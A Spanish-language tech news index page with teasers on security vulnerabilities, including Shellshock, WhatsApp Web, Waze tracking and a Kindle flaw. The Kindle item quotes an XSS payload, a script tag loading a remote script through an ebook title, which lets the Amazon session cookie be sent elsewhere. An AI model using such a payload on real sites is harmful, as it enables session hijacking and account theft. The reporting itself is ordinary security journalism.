Publicidad

RSS Vulnerabilidad

Una vulnerabilidad en la página de login de Google permite descargar malware al identificarse

3 Comentarios
Una vulnerabilidad en la página de login de Google permite descargar malware al identificarse

El analista de seguridad Aidan Woods ha encontrado una pequeña vulnerabilidad en la página de identificación de cuentas de Google. No afecta a nuestra privacidad, pero permite que se pueda modificar la URL para hacer que nos descarguemos cualquier archivo en el momento que pulsemos sobre el botón Siguiente para indentificarnos.

Por raro que parezca, tras haberles notificado la vulnerabilidad desde Google le respondieron a Woods que tras analizarla habían decidido no solucionarla. Esto quiere decir que se podrá seguir aprovechando, por lo que merece la pena que sepamos cómo funciona y cómo evitarla para no acabar descargando ningún malware no deseado.

Leer más »

Con esta vulnerabilidad le podían robar millones fácilmente a Google, Facebook e Instagram

7 Comentarios
Con esta vulnerabilidad le podían robar millones fácilmente a Google, Facebook e Instagram

Arne Swinnen, un investigador belga de seguridad online ha descubierto una vulnerabilidad en el servicio de identificación de Facebook, Google y Microsoft. Aprovechándolo, este investigador calcula que podría robarles varios cientos de miles de dólares a estas tres empresas.

Tal y como explica en su blog, el quid de la cuestión está en el sistema de autentificación en dos pasos que suelen implementar. Si el usuario quiere, las empresas nos llaman a nuestro móvil para decirnos un código de verificación, método que el investigador ha podido explotar registrándose con un teléfono de pago con el que cobrarles por cada llamada recibida.

Leer más »
Publicidad

Una vulnerabilidad de Waze permite seguir todos tus movimientos (y hasta crear falsos atascos)

Comentar
Una vulnerabilidad de Waze permite seguir todos tus movimientos (y hasta crear falsos atascos)

Si tienes un sentido de la orientación tan bueno como el mío (nótese la ironía) probablemente hagas un uso intensivo de Waze, la popular app de GPS para iOS y Android. Waze no sólo te lleva del punto A al punto B, sino que además ofrece información sobre el tráfico en tiempo real, basada en su propia comunidad de usuarios.

Lo malo es que, igual que hay gente que avisa de buena fe de un accidente, de obras en la carretera o de la presencia de una patrulla de la policía, también hay quien podría abusar del sistema y utilizarlo para espiar los movimientos de todos sus usuarios. O al menos eso es lo que denuncia un grupo de investigadores de la Universidad de Santa Barbara en California, tras descubrir una grave vulnerabilidad en Waze que podría dejar al descubierto los desplazamientos de millones de conductores.

Leer más »

El 12 de abril se desvelará el bug Badlock: Samba y Microsoft ya trabajan en parches para sus servidores

2 Comentarios
El 12 de abril se desvelará el bug Badlock: Samba y Microsoft ya trabajan en parches para sus servidores

Si sois administradores de algún servidor que utilice Samba o Windows esto os interesa, porque uno de los desarrolladores de Samba ha descubierto un bug "crucial" de seguridad que afecta a ambos sistemas. Las dos empresas ya están trabajando en solucionarlo, y tendrán un parche preparado para cuando se descubra la vulnerabilidad el 12 de abril.

Aunque aún no sabemos la importancia que puede tener, ya hay quien la ha bautizado como Badlock, y se ha molestado en crear una página web desde la que informarán sobre las novedades que pueda haber, y avisarán a los administradores cuando puedan empezar a parchear sus servidores para minimizar los riesgos.

Leer más »

Así es el bug que ha puesto en peligro a los 200 millones de usuarios de WhatsApp Web

23 Comentarios
Así es el bug que ha puesto en peligro a los 200 millones de usuarios de WhatsApp Web

WhatsApp empezó el año lanzando un cliente web con el que poder utilizar su aplicación desde nuestro navegador. Un WhatsApp Web que empezó estando sólo disponible para usuarios de Android pero que el pasado mes de agosto abrió sus puertas también para usuarios de iOS. No era exactamente lo que los usuarios estaban esperando pero funciona relativamente bien.

Con cerca de 200 de los 900 millones de usuarios de WhatsApp utilizando su aplicación web, hace unas horas una empresa de seguridad daba a conocer una vulnerabilidad descubierta en su página. Se trata de un bug por el que un atacante podría tomar el control de nuestro ordenador con sólo saber nuestro número de teléfono.

Leer más »

Cómo una vulnerabilidad en Bash de Linux, OS X y *NIX es un gran problema de seguridad para todo Internet

66 Comentarios
Cómo una vulnerabilidad en Bash de Linux, OS X y *NIX es un gran problema de seguridad para todo Internet

Si alguna vez habéis trabajado con OS X o Linux, seguro que conocéis bash. Es la terminal por defecto de estos sistemas, donde ponemos los comandos que queremos ejecutar. Es el espacio de trabajo, el equivalente al escritorio cuando usamos el ratón.

Como podréis imaginar, bash es omnipresente y no lo usamos sólo los usuarios sino también muchos programas para ejecutar algunos comandos. Por ejemplo, hay páginas web que internamente llaman a bash para generar algunas páginas (CGI), servidores (y ordenadores) que usan DHCP para obtener sus direcciones IP al conectarse a Internet, y muchas más cosas. Imaginaos qué divertido sería que hubiese un fallo en bash. O mejor aún, no os lo imaginéis: está pasando. De hecho, hasta tiene nombre y todo: Shellshock.

Leer más »
Publicidad

Leer un libro en tu Kindle puede hackear tu cuenta de Amazon

7 Comentarios
Leer un libro en tu Kindle puede hackear tu cuenta de Amazon

Los ataques XSS (cross-site scripting) llevan tiempo siendo una amenaza a la hora de utilizar sitios Web para, por ejemplo, robar cookies y capturar así una sesión en un sitio Web. Y existe una vulnerabilidad en Amazon.com que permite que un libro en nuestro Kindle pueda transferir nuestras credenciales a alguien con malas intenciones.

El mecanismo es realmente simple: si un libro electrónico tiene por título algo como <script src="https://servidor/script.js"></script>, la Web de Amazon ejecutará ese script, por lo que la cookie que almacena la sesión podrá ser transferida a otro servidor. Basta hacer que un usuario descargue ese libro y lo guarde en su aparato. Curiosamente esta vulnerabilidad ya había sido corregida, pero Amazon la volvió a abrir cuando actualizó su aplicación. De hecho hace unos días fue reportada, y todavía no existe respuesta.

El blog B.FL7.DE ha publicado, incluso, un libro electrónico en formato MOBI con el que probar si la vulnerabilidad sigue siendo tal. Cada cuadro emergente, además, es una posibilidad de que la cookie sea transmitida. Nuestra recomendación es que pongamos atención a los libros que guardemos en nuestro lector de libros electrónicos, al menos si queremos evitar las sorpresas desagradables.

Actualización: al parecer Amazon ha corregido esta vulnerabilidad hace unas horas.

Más información | The Digital Reader | B.FL7.DE
En Genbeta | Algunos conceptos básicos de seguridad informática que deberías conocer

Leer más »

¿Ser infectado por ver un vídeo de YouTube? Es posible

14 Comentarios
¿Ser infectado por ver un vídeo de YouTube? Es posible

Cada vez nos sorprendemos menos ante este tipo de noticias. Pongamos la situación: queremos ver un simple vídeo y accedemos a él a través de un enlace totalmente inocuo. Esa acción no es peligrosa... pero al llevarla a cabo podríamos acabar siendo espiados. Una serie de empresas están vendiendo una serie de soluciones que prácticamente son plug and play.

Basta con conectar el dispositivo a puntos de intercambio para, por ejemplo, inyectar información en tráfico no encriptado (como puede ser un vídeo de gatitos de YouTube). Junto con el streaming en cuestión, lo que haría este dispositivo (con el software modificado, que conste) sería inyectar malware que se aprovecha, por ejemplo, de vulnerabilidades en versiones antiguas de Flash o de Java.

Leer más »

Atacantes consiguen monitorizar a los usuarios de la red TOR

11 Comentarios
Atacantes consiguen monitorizar a los usuarios de la red TOR

TOR lleva muchos meses en boca de los usuarios que pueblan la red de redes. Desde que Edward Snowden publicó algunos documentos en los que afirmaba que estabamos siendo vigilados por diversas agencias gubernamentales, no han sido pocos los internautas que han estado utilizando la herramienta con el fin de proteger sus comunicaciones. Pero, a la vez, ha habido gente que ha estado intentando vulnerarla. Y parece que recientemente lo han conseguido.

Según han anunciado en su blog oficial, se ha descubierto que alguien ha estado intentando comprometer la red mediante la monitorización de los usuarios que utilizan el servicio. Y dicho ataque, tal y como se ha afirmado, ha tenido un cierto éxito al poder obtener información sobre los internautas que han estado navegando utilizando las "trampas" que se han puesto.

Leer más »

Tails es vulnerable: te enseñamos a evitar el fallo de I2P

2 Comentarios
Tails es vulnerable: te enseñamos a evitar el fallo de I2P

Estamos seguros de que muchos conoceréis la distribución Linux Tails. No en vano, era recomendada hace unos meses por Edward Snowden, quien comentaba que era la más segura y, por lo tanto, la que él utilizaba para navegar por Internet. Un software que nos permitía estar en la red sin dejar rastro y sin la necesidad de realizar complicadas configuraciones.

Sin embargo, los encargados del paquete han anunciado recientemente que uno de los paquetes incluidos está provocando que la distribución ya no sea todo lo segura que parecía. Concretamente, I2P tiene un fallo de seguridad que, en el caso de ser aprovechado, puede provocar que a lo usuarios se les quite la anonimización que se promete. Un error que resulta bastante grave.

Leer más »
Publicidad

Ver más artículos